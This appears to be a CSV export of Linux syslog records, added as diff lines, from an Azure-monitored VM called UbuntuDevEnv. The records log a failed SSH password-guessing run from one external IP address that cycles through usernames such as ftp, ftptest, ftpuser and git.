+2628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:12,UbuntuDevEnv,2019-06-28 05:18:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:14,UbuntuDevEnv,2019-06-28 05:18:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ftp from 193.201.224.232 port 63992 ssh2 [preauth],93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:14,UbuntuDevEnv,2019-06-28 05:18:14,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:14,UbuntuDevEnv,2019-06-28 05:18:14,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:14,UbuntuDevEnv,2019-06-28 05:18:14,auth,UbuntuDevEnv,info,Disconnecting invalid user ftp 193.201.224.232 port 63992: Too many authentication failures [preauth],93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:14,UbuntuDevEnv,2019-06-28 05:18:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:17,UbuntuDevEnv,2019-06-28 05:18:16,auth,UbuntuDevEnv,info,Invalid user ftp from 193.201.224.232 port 40715,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:17,UbuntuDevEnv,2019-06-28 05:18:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:17,UbuntuDevEnv,2019-06-28 05:18:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:19,UbuntuDevEnv,2019-06-28 05:18:18,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 40715 ssh2,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:19,UbuntuDevEnv,2019-06-28 05:18:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:22,UbuntuDevEnv,2019-06-28 05:18:21,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 40715 ssh2,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:22,UbuntuDevEnv,2019-06-28 05:18:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:24,UbuntuDevEnv,2019-06-28 05:18:23,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 40715 ssh2,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:24,UbuntuDevEnv,2019-06-28 05:18:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:27,UbuntuDevEnv,2019-06-28 05:18:26,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 40715 ssh2,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:27,UbuntuDevEnv,2019-06-28 05:18:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:28,UbuntuDevEnv,2019-06-28 05:18:27,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 40715 ssh2,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:28,UbuntuDevEnv,2019-06-28 05:18:28,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:28,UbuntuDevEnv,2019-06-28 05:18:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:28,UbuntuDevEnv,2019-06-28 05:18:28,auth,UbuntuDevEnv,info,"Disconnecting invalid user ftp 193.201.224.232 port 40715: Change of username or service not allowed: (ftp,ssh-connection) -> (ftptest,ssh-connection) [preauth]",93863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,40715,,
+2649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:31,UbuntuDevEnv,2019-06-28 05:18:30,auth,UbuntuDevEnv,info,Invalid user ftptest from 193.201.224.232 port 20917,93917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,193.201.224.2,20917,,
+2650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:31,UbuntuDevEnv,2019-06-28 05:18:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:31,UbuntuDevEnv,2019-06-28 05:18:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:34,UbuntuDevEnv,2019-06-28 05:18:33,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 193.201.224.232 port 20917 ssh2,93917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,193.201.224.2,20917,,
+2653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:35,UbuntuDevEnv,2019-06-28 05:18:34,auth,UbuntuDevEnv,info,"Disconnecting invalid user ftptest 193.201.224.232 port 20917: Change of username or service not allowed: (ftptest,ssh-connection) -> (ftpuser,ssh-connection) [preauth]",93917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,193.201.224.2,20917,,
+2654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:04,UbuntuDevEnv,2019-06-28 05:19:03,auth,UbuntuDevEnv,info,Invalid user ftpuser from 193.201.224.232 port 29523,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:04,UbuntuDevEnv,2019-06-28 05:19:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:04,UbuntuDevEnv,2019-06-28 05:19:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:05,UbuntuDevEnv,2019-06-28 05:19:05,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:07,UbuntuDevEnv,2019-06-28 05:19:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:09,UbuntuDevEnv,2019-06-28 05:19:09,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:09,UbuntuDevEnv,2019-06-28 05:19:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:11,UbuntuDevEnv,2019-06-28 05:19:11,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:12,UbuntuDevEnv,2019-06-28 05:19:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:14,UbuntuDevEnv,2019-06-28 05:19:14,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:14,UbuntuDevEnv,2019-06-28 05:19:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:16,UbuntuDevEnv,2019-06-28 05:19:15,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:16,UbuntuDevEnv,2019-06-28 05:19:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:18,auth,UbuntuDevEnv,info,Disconnecting invalid user ftpuser 193.201.224.232 port 29523: Too many authentication failures [preauth],93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ftpuser from 193.201.224.232 port 29523 ssh2 [preauth],93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:18,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 29523 ssh2,93958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,29523,,
+2672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:19,auth,UbuntuDevEnv,info,Invalid user ftpuser from 193.201.224.232 port 24927,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,24927,,
+2673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:19,UbuntuDevEnv,2019-06-28 05:19:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:21,UbuntuDevEnv,2019-06-28 05:19:20,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 24927 ssh2,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,24927,,
+2676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:21,UbuntuDevEnv,2019-06-28 05:19:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:22,UbuntuDevEnv,2019-06-28 05:19:22,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 24927 ssh2,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,24927,,
+2678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:22,UbuntuDevEnv,2019-06-28 05:19:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:24,UbuntuDevEnv,2019-06-28 05:19:24,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 193.201.224.232 port 24927 ssh2,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,24927,,
+2680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:25,UbuntuDevEnv,2019-06-28 05:19:24,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:25,UbuntuDevEnv,2019-06-28 05:19:24,auth,UbuntuDevEnv,info,"Disconnecting invalid user ftpuser 193.201.224.232 port 24927: Change of username or service not allowed: (ftpuser,ssh-connection) -> (git,ssh-connection) [preauth]",94090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,193.201.224.2,24927,,
+2682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:26,UbuntuDevEnv,2019-06-28 05:19:25,auth,UbuntuDevEnv,info,Invalid user git from 193.201.224.232 port 31683,94122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,193.201.224.2,31683,,
+2683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:26,UbuntuDevEnv,2019-06-28 05:19:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:26,UbuntuDevEnv,2019-06-28 05:19:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:27,UbuntuDevEnv,2019-06-28 05:19:27,auth,UbuntuDevEnv,info,Failed password for invalid user git from 193.201.224.232 port 31683 ssh2,94122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,193.201.224.2,31683,,
+2686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:31,UbuntuDevEnv,2019-06-28 05:19:30,auth,UbuntuDevEnv,info,"Disconnecting invalid user git 193.201.224.232 port 31683: Change of username or service not allowed: (git,ssh-connection) -> (halt,ssh-connection) [preauth]",94122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,193.201.224.2,31683,,
